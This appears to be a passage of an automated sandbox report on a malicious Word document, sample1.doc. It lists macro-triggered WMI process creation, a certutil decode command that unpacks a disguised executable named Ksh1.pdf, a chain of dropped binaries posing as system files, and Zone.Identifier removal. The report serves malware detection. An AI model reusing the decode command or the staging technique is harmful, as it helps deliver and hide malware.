Source: C:\Windows\SysWOW64\oleaccrc\TSChannel.exe	Code function: 14_2_01C10400 GetCurrentProcess,NtQueryInformationProcess,GetProcessHeap,HeapFree,GetProcessHeap,RtlAllocateHeap,GetCurrentProcess,NtQueryInformationProcess,RtlMoveMemory,RtlMoveMemory,RtlMoveMemory,RtlMoveMemory,RtlMoveMemory,RtlMoveMemory,	14_2_01C10400
Source: C:\Windows\SysWOW64\iprtrmgr\qdvd.exe	Code function: 15_2_003E0400 GetCurrentProcess,NtQueryInformationProcess,GetProcessHeap,HeapFree,GetProcessHeap,RtlAllocateHeap,GetCurrentProcess,NtQueryInformationProcess,RtlMoveMemory,RtlMoveMemory,RtlMoveMemory,RtlMoveMemory,RtlMoveMemory,RtlMoveMemory,	15_2_003E0400
Source: C:\Windows\SysWOW64\whhelper\msvcp120_clr0400.exe	Code function: 16_2_00460400 GetCurrentProcess,NtQueryInformationProcess,GetProcessHeap,HeapFree,GetProcessHeap,RtlAllocateHeap,GetCurrentProcess,NtQueryInformationProcess,RtlMoveMemory,RtlMoveMemory,RtlMoveMemory,RtlMoveMemory,RtlMoveMemory,RtlMoveMemory,	16_2_00460400

Contains functionality to delete services

Source: C:\Windows\SysWOW64\mfcm140\normaliz.exe

Code function: 9_2_003F8E80 CloseServiceHandle,OpenSCManagerW,DeleteService,OpenServiceW,OpenServiceW,CloseServiceHandle,

9_2_003F8E80

Creates files inside the system directory

Source: C:\Windows\System32\certutil.exe

File created: C:\Windows\cer69EA.tmp

Jump to behavior

Deletes files inside the Windows folder

Source: C:\Windows\System32\certutil.exe

File deleted: C:\Windows\cer69EA.tmp

Jump to behavior

Detected potential crypto function

Source: C:\Users\user\AppData\Local\Temp\tmp_e473b4.exe	Code function: 8_2_0040314D	8_2_0040314D
Source: C:\Users\user\AppData\Local\Temp\tmp_e473b4.exe	Code function: 8_2_004052D4	8_2_004052D4
Source: C:\Users\user\AppData\Local\Temp\tmp_e473b4.exe	Code function: 8_2_00409350	8_2_00409350
Source: C:\Users\user\AppData\Local\Temp\tmp_e473b4.exe	Code function: 8_2_00406DA8	8_2_00406DA8
Source: C:\Users\user\AppData\Local\Temp\tmp_e473b4.exe	Code function: 8_2_006478B0	8_2_006478B0
Source: C:\Users\user\AppData\Local\Temp\tmp_e473b4.exe	Code function: 8_2_00641C70	8_2_00641C70
Source: C:\Users\user\AppData\Local\Temp\tmp_e473b4.exe	Code function: 8_2_006465E0	8_2_006465E0
Source: C:\Windows\SysWOW64\mfcm140\normaliz.exe	Code function: 9_2_003F1C70	9_2_003F1C70
Source: C:\Windows\SysWOW64\mfcm140\normaliz.exe	Code function: 9_2_003F78B0	9_2_003F78B0
Source: C:\Windows\SysWOW64\mfcm140\normaliz.exe	Code function: 9_2_003F65E0	9_2_003F65E0
Source: C:\Windows\SysWOW64\clip\mmcshext.exe	Code function: 10_2_003F1C70	10_2_003F1C70
Source: C:\Windows\SysWOW64\clip\mmcshext.exe	Code function: 10_2_003F78B0	10_2_003F78B0
Source: C:\Windows\SysWOW64\clip\mmcshext.exe	Code function: 10_2_003F65E0	10_2_003F65E0
Source: C:\Windows\SysWOW64\regedt32\ir50_qcx.exe	Code function: 11_2_00331C70	11_2_00331C70
Source: C:\Windows\SysWOW64\regedt32\ir50_qcx.exe	Code function: 11_2_003378B0	11_2_003378B0
Source: C:\Windows\SysWOW64\regedt32\ir50_qcx.exe	Code function: 11_2_003365E0	11_2_003365E0
Source: C:\Windows\SysWOW64\KBDNEPR\dhcpcmonitor.exe	Code function: 12_2_004F1C70	12_2_004F1C70
Source: C:\Windows\SysWOW64\KBDNEPR\dhcpcmonitor.exe	Code function: 12_2_004F65E0	12_2_004F65E0
Source: C:\Windows\SysWOW64\KBDNEPR\dhcpcmonitor.exe	Code function: 12_2_004F78B0	12_2_004F78B0
Source: C:\Windows\SysWOW64\api-ms-win-core-interlocked-l1-1-0\adsmsext.exe	Code function: 13_2_00291C70	13_2_00291C70
Source: C:\Windows\SysWOW64\api-ms-win-core-interlocked-l1-1-0\adsmsext.exe	Code function: 13_2_002978B0	13_2_002978B0
Source: C:\Windows\SysWOW64\api-ms-win-core-interlocked-l1-1-0\adsmsext.exe	Code function: 13_2_002965E0	13_2_002965E0
Source: C:\Windows\SysWOW64\oleaccrc\TSChannel.exe	Code function: 14_2_01C665E0	14_2_01C665E0
Source: C:\Windows\SysWOW64\oleaccrc\TSChannel.exe	Code function: 14_2_01C678B0	14_2_01C678B0
Source: C:\Windows\SysWOW64\oleaccrc\TSChannel.exe	Code function: 14_2_01C61C70	14_2_01C61C70
Source: C:\Windows\SysWOW64\iprtrmgr\qdvd.exe	Code function: 15_2_003F1C70	15_2_003F1C70
Source: C:\Windows\SysWOW64\iprtrmgr\qdvd.exe	Code function: 15_2_003F78B0	15_2_003F78B0
Source: C:\Windows\SysWOW64\iprtrmgr\qdvd.exe	Code function: 15_2_003F65E0	15_2_003F65E0
Source: C:\Windows\SysWOW64\whhelper\msvcp120_clr0400.exe	Code function: 16_2_00471C70	16_2_00471C70
Source: C:\Windows\SysWOW64\whhelper\msvcp120_clr0400.exe	Code function: 16_2_004765E0	16_2_004765E0
Source: C:\Windows\SysWOW64\whhelper\msvcp120_clr0400.exe	Code function: 16_2_004778B0	16_2_004778B0

Document contains an embedded VBA macro which executes code when the document is opened / closed

Source: sample1.doc	OLE, VBA macro line: Private Sub Document_Close()
Source: sample1.doc	OLE, VBA macro line: Form_Close
Source: sample1.doc	OLE, VBA macro line: Private Sub Form_Close()
Source: VBA code instrumentation	OLE, VBA macro: Module ThisDocument, Function Document_Close	Name: Document_Close
Source: VBA code instrumentation	OLE, VBA macro: Module ThisDocument, Function Form_Close	Name: Form_Close

Document contains embedded VBA macros

Source: sample1.doc

OLE indicator, VBA macros: true

Dropped file seen in connection with other malware

Source: Joe Sandbox View

Dropped File: C:\Users\Public\Ksh1.pdf FB07F875DC45E6045735513E75A83C50C78154851BD23A645D43EA853E6800AC

Yara signature match

Source: 00000006.00000002.2250987083.000000000061D000.00000004.00000020.sdmp, type: MEMORY

Source: tmp_e473b4.exe, 00000008.00000002.2255365676.000000000042A000.00000004.00020000.sdmp, normaliz.exe, 00000009.00000002.2261025209.000000000042A000.00000004.00020000.sdmp, mmcshext.exe, 0000000A.00000002.2265147822.000000000042A000.00000004.00020000.sdmp, ir50_qcx.exe, 0000000B.00000002.2269487904.000000000042A000.00000004.00020000.sdmp, dhcpcmonitor.exe, 0000000C.00000002.2273981722.000000000042A000.00000004.00020000.sdmp	Binary or memory string: @*\AC:\aseb\Aseb.vbp
Source: tmp_e473b4.exe, normaliz.exe, 00000009.00000000.2254785009.0000000000401000.00000020.00020000.sdmp, mmcshext.exe, 0000000A.00000002.2265125370.0000000000401000.00000020.00020000.sdmp, ir50_qcx.exe, 0000000B.00000002.2269466325.0000000000401000.00000020.00020000.sdmp, dhcpcmonitor.exe, 0000000C.00000002.2273952639.0000000000401000.00000020.00020000.sdmp	Binary or memory string: B*\AC:\aseb\Aseb.vbp

Source: classification engine

Classification label: mal100.troj.expl.evad.winDOC@20/19@0/100

Source: C:\Users\user\AppData\Local\Temp\tmp_e473b4.exe	Code function: OpenSCManagerW,_snwprintf,CreateServiceW,CloseServiceHandle,CloseServiceHandle,	8_2_00648970
Source: C:\Windows\SysWOW64\mfcm140\normaliz.exe	Code function: OpenSCManagerW,_snwprintf,CreateServiceW,CloseServiceHandle,CloseServiceHandle,	9_2_003F8970
Source: C:\Windows\SysWOW64\clip\mmcshext.exe	Code function: OpenSCManagerW,OpenSCManagerW,_snwprintf,CreateServiceW,CloseServiceHandle,CloseServiceHandle,	10_2_003F8970
Source: C:\Windows\SysWOW64\regedt32\ir50_qcx.exe	Code function: OpenSCManagerW,_snwprintf,CreateServiceW,CloseServiceHandle,CloseServiceHandle,	11_2_00338970
Source: C:\Windows\SysWOW64\KBDNEPR\dhcpcmonitor.exe	Code function: OpenSCManagerW,_snwprintf,CreateServiceW,CloseServiceHandle,CloseServiceHandle,	12_2_004F8970
Source: C:\Windows\SysWOW64\api-ms-win-core-interlocked-l1-1-0\adsmsext.exe	Code function: OpenSCManagerW,_snwprintf,CreateServiceW,CloseServiceHandle,CloseServiceHandle,	13_2_00298970
Source: C:\Windows\SysWOW64\oleaccrc\TSChannel.exe	Code function: OpenSCManagerW,_snwprintf,CreateServiceW,CloseServiceHandle,CloseServiceHandle,	14_2_01C68970
Source: C:\Windows\SysWOW64\iprtrmgr\qdvd.exe	Code function: OpenSCManagerW,_snwprintf,CreateServiceW,CloseServiceHandle,CloseServiceHandle,	15_2_003F8970

Source: C:\Windows\SysWOW64\whhelper\msvcp120_clr0400.exe

Code function: 16_2_00474C80 CreateToolhelp32Snapshot,CreateToolhelp32Snapshot,Process32NextW,Process32FirstW,CloseHandle,CloseHandle,

16_2_00474C80

Source: C:\Users\user\AppData\Local\Temp\tmp_e473b4.exe

8_2_00645040

Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE

File created: C:\Users\user\Desktop\~$ample1.doc

Jump to behavior

Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE

File created: C:\Users\user\AppData\Local\Temp\CVRB76C.tmp

Jump to behavior

Source: sample1.doc

OLE indicator, Word Document stream: true

Source: sample1.doc

OLE document summary: title field not present or empty

Source: C:\Windows\System32\certutil.exe	Console Write: ................................I.n.p.u.t. .L.e.n.g.t.h. .=. .5.9.5.9.7.2...............#.......(d......................*.......q(.v............	Jump to behavior
Source: C:\Windows\System32\certutil.exe	Console Write: ........................................(.P.............t.......<.......H...............#.......(d..............................................	Jump to behavior
Source: C:\Windows\System32\certutil.exe	Console Write: ................................O.u.t.p.u.t. .L.e.n.g.t.h. .=. .4.4.6.9.7.6.............#.......(d......................,.......................	Jump to behavior
Source: C:\Windows\System32\certutil.exe	Console Write: ........................................(.P.............t.......<.......S...............#.......(d..............................................	Jump to behavior
Source: C:\Windows\System32\certutil.exe	Console Write: ................................p.......(.P.............t.......<.......W...............#........3......................b.......................	Jump to behavior
Source: C:\Windows\System32\certutil.exe	Console Write: ........................................(.P.............t.......<.......[...............#........3..............................................	Jump to behavior

Source: C:\Users\user\AppData\Local\Temp\tmp_e473b4.exe	Section loaded: C:\Windows\SysWOW64\msvbvm60.dll	Jump to behavior
Source: C:\Windows\SysWOW64\mfcm140\normaliz.exe	Section loaded: C:\Windows\SysWOW64\msvbvm60.dll	Jump to behavior
Source: C:\Windows\SysWOW64\clip\mmcshext.exe	Section loaded: C:\Windows\SysWOW64\msvbvm60.dll	Jump to behavior
Source: C:\Windows\SysWOW64\regedt32\ir50_qcx.exe	Section loaded: C:\Windows\SysWOW64\msvbvm60.dll	Jump to behavior
Source: C:\Windows\SysWOW64\KBDNEPR\dhcpcmonitor.exe	Section loaded: C:\Windows\SysWOW64\msvbvm60.dll	Jump to behavior
Source: C:\Windows\SysWOW64\api-ms-win-core-interlocked-l1-1-0\adsmsext.exe	Section loaded: C:\Windows\SysWOW64\msvbvm60.dll	Jump to behavior
Source: C:\Windows\SysWOW64\oleaccrc\TSChannel.exe	Section loaded: C:\Windows\SysWOW64\msvbvm60.dll	Jump to behavior
Source: C:\Windows\SysWOW64\iprtrmgr\qdvd.exe	Section loaded: C:\Windows\SysWOW64\msvbvm60.dll	Jump to behavior
Source: C:\Windows\SysWOW64\whhelper\msvcp120_clr0400.exe	Section loaded: C:\Windows\SysWOW64\msvbvm60.dll	Jump to behavior

Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	WMI Queries: IWbemServices::ExecMethod - Win32_Process::create
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	WMI Queries: IWbemServices::ExecMethod - Win32_Process::create

Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE

File read: C:\Users\desktop.ini

Jump to behavior

Source: C:\Windows\System32\certutil.exe

Key opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: C:\Windows\SysWOW64\whhelper\msvcp120_clr0400.exe	File read: C:\Windows\System32\drivers\etc\hosts			Jump to behavior
Source: C:\Windows\SysWOW64\whhelper\msvcp120_clr0400.exe	File read: C:\Windows\System32\drivers\etc\hosts			Jump to behavior

Source: sample1.doc	Virustotal: Detection: 57%
Source: sample1.doc	Metadefender: Detection: 45%
Source: sample1.doc	ReversingLabs: Detection: 68%

Source: unknown	Process created: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE 'C:\Program Files\Microsoft Office\Office14\WINWORD.EXE' /Automation -Embedding
Source: unknown	Process created: C:\Windows\System32\certutil.exe Certutil -decode C:\Users\Public\Ksh1.xls C:\Users\Public\Ksh1.pdf
Source: unknown	Process created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k WerSvcGroup
Source: unknown	Process created: C:\Users\user\AppData\Local\Temp\tmp_e473b4.exe C:\Users\user\AppData\Local\Temp/tmp_e473b4.exe
Source: C:\Users\user\AppData\Local\Temp\tmp_e473b4.exe	Process created: C:\Windows\SysWOW64\mfcm140\normaliz.exe C:\Windows\SysWOW64\mfcm140\normaliz.exe
Source: C:\Windows\SysWOW64\mfcm140\normaliz.exe	Process created: C:\Windows\SysWOW64\clip\mmcshext.exe C:\Windows\SysWOW64\clip\mmcshext.exe
Source: C:\Windows\SysWOW64\clip\mmcshext.exe	Process created: C:\Windows\SysWOW64\regedt32\ir50_qcx.exe C:\Windows\SysWOW64\regedt32\ir50_qcx.exe
Source: C:\Windows\SysWOW64\regedt32\ir50_qcx.exe	Process created: C:\Windows\SysWOW64\KBDNEPR\dhcpcmonitor.exe C:\Windows\SysWOW64\KBDNEPR\dhcpcmonitor.exe
Source: C:\Windows\SysWOW64\KBDNEPR\dhcpcmonitor.exe	Process created: C:\Windows\SysWOW64\api-ms-win-core-interlocked-l1-1-0\adsmsext.exe C:\Windows\SysWOW64\api-ms-win-core-interlocked-l1-1-0\adsmsext.exe
Source: C:\Windows\SysWOW64\api-ms-win-core-interlocked-l1-1-0\adsmsext.exe	Process created: C:\Windows\SysWOW64\oleaccrc\TSChannel.exe C:\Windows\SysWOW64\oleaccrc\TSChannel.exe
Source: C:\Windows\SysWOW64\oleaccrc\TSChannel.exe	Process created: C:\Windows\SysWOW64\iprtrmgr\qdvd.exe C:\Windows\SysWOW64\iprtrmgr\qdvd.exe
Source: C:\Windows\SysWOW64\iprtrmgr\qdvd.exe	Process created: C:\Windows\SysWOW64\whhelper\msvcp120_clr0400.exe C:\Windows\SysWOW64\whhelper\msvcp120_clr0400.exe
Source: C:\Users\user\AppData\Local\Temp\tmp_e473b4.exe	Process created: C:\Windows\SysWOW64\mfcm140\normaliz.exe C:\Windows\SysWOW64\mfcm140\normaliz.exe	Jump to behavior
Source: C:\Windows\SysWOW64\mfcm140\normaliz.exe	Process created: C:\Windows\SysWOW64\clip\mmcshext.exe C:\Windows\SysWOW64\clip\mmcshext.exe	Jump to behavior
Source: C:\Windows\SysWOW64\clip\mmcshext.exe	Process created: C:\Windows\SysWOW64\regedt32\ir50_qcx.exe C:\Windows\SysWOW64\regedt32\ir50_qcx.exe	Jump to behavior
Source: C:\Windows\SysWOW64\regedt32\ir50_qcx.exe	Process created: C:\Windows\SysWOW64\KBDNEPR\dhcpcmonitor.exe C:\Windows\SysWOW64\KBDNEPR\dhcpcmonitor.exe	Jump to behavior
Source: C:\Windows\SysWOW64\KBDNEPR\dhcpcmonitor.exe	Process created: C:\Windows\SysWOW64\api-ms-win-core-interlocked-l1-1-0\adsmsext.exe C:\Windows\SysWOW64\api-ms-win-core-interlocked-l1-1-0\adsmsext.exe	Jump to behavior
Source: C:\Windows\SysWOW64\api-ms-win-core-interlocked-l1-1-0\adsmsext.exe	Process created: C:\Windows\SysWOW64\oleaccrc\TSChannel.exe C:\Windows\SysWOW64\oleaccrc\TSChannel.exe	Jump to behavior
Source: C:\Windows\SysWOW64\oleaccrc\TSChannel.exe	Process created: C:\Windows\SysWOW64\iprtrmgr\qdvd.exe C:\Windows\SysWOW64\iprtrmgr\qdvd.exe	Jump to behavior
Source: C:\Windows\SysWOW64\iprtrmgr\qdvd.exe	Process created: C:\Windows\SysWOW64\whhelper\msvcp120_clr0400.exe C:\Windows\SysWOW64\whhelper\msvcp120_clr0400.exe	Jump to behavior

Source: C:\Users\user\AppData\Local\Temp\tmp_e473b4.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{1F486A52-3CB1-48FD-8F50-B8DC300D9F9D}\InProcServer32

Jump to behavior

Source: Window Recorder

Window detected: More than 3 window changes detected

Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE

Key opened: HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Word\Resiliency\StartupItems

Jump to behavior

Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE

File opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dll

Jump to behavior

Data Obfuscation:

Uses code obfuscation techniques (call, push, ret)

Source: C:\Users\user\AppData\Local\Temp\tmp_e473b4.exe	Code function: 8_2_00404803 push ecx; iretd	8_2_004047EF
Source: C:\Users\user\AppData\Local\Temp\tmp_e473b4.exe	Code function: 8_2_00404021 push ecx; retf	8_2_00404037
Source: C:\Users\user\AppData\Local\Temp\tmp_e473b4.exe	Code function: 8_2_00408839 push esi; iretd	8_2_00408893
Source: C:\Users\user\AppData\Local\Temp\tmp_e473b4.exe	Code function: 8_2_0040610E push ecx; retf	8_2_0040611B
Source: C:\Users\user\AppData\Local\Temp\tmp_e473b4.exe	Code function: 8_2_0040A12E push ecx; iretd	8_2_0040A12F
Source: C:\Users\user\AppData\Local\Temp\tmp_e473b4.exe	Code function: 8_2_004031D1 push ecx; iretd	8_2_00403233
Source: C:\Users\user\AppData\Local\Temp\tmp_e473b4.exe	Code function: 8_2_0040721C pushad ; iretd	8_2_00407223
Source: C:\Users\user\AppData\Local\Temp\tmp_e473b4.exe	Code function: 8_2_0040321E push ecx; iretd	8_2_00403233
Source: C:\Users\user\AppData\Local\Temp\tmp_e473b4.exe	Code function: 8_2_00403236 push ecx; iretd	8_2_00403287
Source: C:\Users\user\AppData\Local\Temp\tmp_e473b4.exe	Code function: 8_2_00405AE2 push ecx; ret	8_2_00405B3F
Source: C:\Users\user\AppData\Local\Temp\tmp_e473b4.exe	Code function: 8_2_004062F6 push ebx; iretd	8_2_004062F7
Source: C:\Users\user\AppData\Local\Temp\tmp_e473b4.exe	Code function: 8_2_0040AAF9 push esp; retf	8_2_0040AB17
Source: C:\Users\user\AppData\Local\Temp\tmp_e473b4.exe	Code function: 8_2_00403B4E push ecx; retf	8_2_00403B4F
Source: C:\Users\user\AppData\Local\Temp\tmp_e473b4.exe	Code function: 8_2_00404B02 push ecx; ret	8_2_00404B03
Source: C:\Users\user\AppData\Local\Temp\tmp_e473b4.exe	Code function: 8_2_00403B35 push ecx; retf	8_2_00403B47
Source: C:\Users\user\AppData\Local\Temp\tmp_e473b4.exe	Code function: 8_2_004053DD push ecx; ret	8_2_004053E7
Source: C:\Users\user\AppData\Local\Temp\tmp_e473b4.exe	Code function: 8_2_00408464 push ecx; ret	8_2_0040847B
Source: C:\Users\user\AppData\Local\Temp\tmp_e473b4.exe	Code function: 8_2_00407C76 push ebp; retf	8_2_00407C78
Source: C:\Users\user\AppData\Local\Temp\tmp_e473b4.exe	Code function: 8_2_0040A404 push ecx; ret	8_2_0040A497
Source: C:\Users\user\AppData\Local\Temp\tmp_e473b4.exe	Code function: 8_2_004074C5 push ecx; iretd	8_2_004074CF
Source: C:\Users\user\AppData\Local\Temp\tmp_e473b4.exe	Code function: 8_2_004044D5 push ecx; iretd	8_2_004044F3
Source: C:\Users\user\AppData\Local\Temp\tmp_e473b4.exe	Code function: 8_2_004054B6 push ecx; retf	8_2_004054B7
Source: C:\Users\user\AppData\Local\Temp\tmp_e473b4.exe	Code function: 8_2_0040450F push ecx; retf	8_2_00404523
Source: C:\Users\user\AppData\Local\Temp\tmp_e473b4.exe	Code function: 8_2_00404539 push ecx; retf	8_2_00404523
Source: C:\Users\user\AppData\Local\Temp\tmp_e473b4.exe	Code function: 8_2_00406DA8 push eax; retf	8_2_00406FAF
Source: C:\Users\user\AppData\Local\Temp\tmp_e473b4.exe	Code function: 8_2_0040A646 push edx; iretd	8_2_0040A647
Source: C:\Users\user\AppData\Local\Temp\tmp_e473b4.exe	Code function: 8_2_00403E52 push eax; ret	8_2_00403E54
Source: C:\Users\user\AppData\Local\Temp\tmp_e473b4.exe	Code function: 8_2_00405655 push ecx; retf	8_2_0040565F
Source: C:\Users\user\AppData\Local\Temp\tmp_e473b4.exe	Code function: 8_2_00407E7E push ecx; iretd	8_2_00407E7F
Source: C:\Users\user\AppData\Local\Temp\tmp_e473b4.exe	Code function: 8_2_00409E0A push ecx; ret	8_2_00409E0B
Source: C:\Users\user\AppData\Local\Temp\tmp_e473b4.exe	Code function: 8_2_0040869A push ecx; retf	8_2_0040869B

Persistence and Installation Behavior:

Creates processes via WMI

Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	WMI Queries: IWbemServices::ExecMethod - Win32_Process::create
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	WMI Queries: IWbemServices::ExecMethod - Win32_Process::create

Drops executables to the windows directory (C:\Windows) and starts them

Source: C:\Windows\SysWOW64\oleaccrc\TSChannel.exe	Executable created and started: C:\Windows\SysWOW64\iprtrmgr\qdvd.exe	Jump to behavior
Source: C:\Windows\SysWOW64\api-ms-win-core-interlocked-l1-1-0\adsmsext.exe	Executable created and started: C:\Windows\SysWOW64\oleaccrc\TSChannel.exe	Jump to behavior
Source: C:\Windows\SysWOW64\iprtrmgr\qdvd.exe	Executable created and started: C:\Windows\SysWOW64\whhelper\msvcp120_clr0400.exe	Jump to behavior
Source: C:\Windows\SysWOW64\mfcm140\normaliz.exe	Executable created and started: C:\Windows\SysWOW64\clip\mmcshext.exe	Jump to behavior
Source: C:\Windows\SysWOW64\regedt32\ir50_qcx.exe	Executable created and started: C:\Windows\SysWOW64\KBDNEPR\dhcpcmonitor.exe	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\tmp_e473b4.exe	Executable created and started: C:\Windows\SysWOW64\mfcm140\normaliz.exe	Jump to behavior
Source: C:\Windows\SysWOW64\KBDNEPR\dhcpcmonitor.exe	Executable created and started: C:\Windows\SysWOW64\api-ms-win-core-interlocked-l1-1-0\adsmsext.exe	Jump to behavior
Source: C:\Windows\SysWOW64\clip\mmcshext.exe	Executable created and started: C:\Windows\SysWOW64\regedt32\ir50_qcx.exe	Jump to behavior

Drops PE files

Source: C:\Windows\System32\certutil.exe

File created: C:\Users\Public\Ksh1.pdf

Jump to dropped file

Drops PE files to the user directory

Source: C:\Windows\System32\certutil.exe

File created: C:\Users\Public\Ksh1.pdf

Jump to dropped file

Drops files with a non-matching file extension (content does not match file extension)

Source: C:\Windows\System32\certutil.exe

File created: C:\Users\Public\Ksh1.pdf

Jump to dropped file

Boot Survival:

Drops PE files to the user root directory

Source: C:\Windows\System32\certutil.exe

File created: C:\Users\Public\Ksh1.pdf

Jump to dropped file

Hooking and other Techniques for Hiding and Protection:

Creates and opens a fake document (probably a fake document to hide exploiting)

Source: unknown

Process created: cmd line: ksh1.pdf

Hides that the sample has been downloaded from the Internet (zone.identifier)

Source: C:\Users\user\AppData\Local\Temp\tmp_e473b4.exe	File opened: C:\Windows\SysWOW64\mfcm140\normaliz.exe:Zone.Identifier read attributes \| delete	Jump to behavior
Source: C:\Windows\SysWOW64\mfcm140\normaliz.exe	File opened: C:\Windows\SysWOW64\clip\mmcshext.exe:Zone.Identifier read attributes \| delete	Jump to behavior
Source: C:\Windows\SysWOW64\clip\mmcshext.exe	File opened: C:\Windows\SysWOW64\regedt32\ir50_qcx.exe:Zone.Identifier read attributes \| delete	Jump to behavior
Source: C:\Windows\SysWOW64\regedt32\ir50_qcx.exe	File opened: C:\Windows\SysWOW64\KBDNEPR\dhcpcmonitor.exe:Zone.Identifier read attributes \| delete	Jump to behavior
Source: C:\Windows\SysWOW64\KBDNEPR\dhcpcmonitor.exe	File opened: C:\Windows\SysWOW64\api-ms-win-core-interlocked-l1-1-0\adsmsext.exe:Zone.Identifier read attributes \| delete	Jump to behavior
Source: C:\Windows\SysWOW64\api-ms-win-core-interlocked-l1-1-0\adsmsext.exe	File opened: C:\Windows\SysWOW64\oleaccrc\TSChannel.exe:Zone.Identifier read attributes \| delete	Jump to behavior
Source: C:\Windows\SysWOW64\oleaccrc\TSChannel.exe	File opened: C:\Windows\SysWOW64\iprtrmgr\qdvd.exe:Zone.Identifier read attributes \| delete	Jump to behavior
Source: C:\Windows\SysWOW64\iprtrmgr\qdvd.exe	File opened: C:\Windows\SysWOW64\whhelper\msvcp120_clr0400.exe:Zone.Identifier read attributes \| delete	Jump to behavior

Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
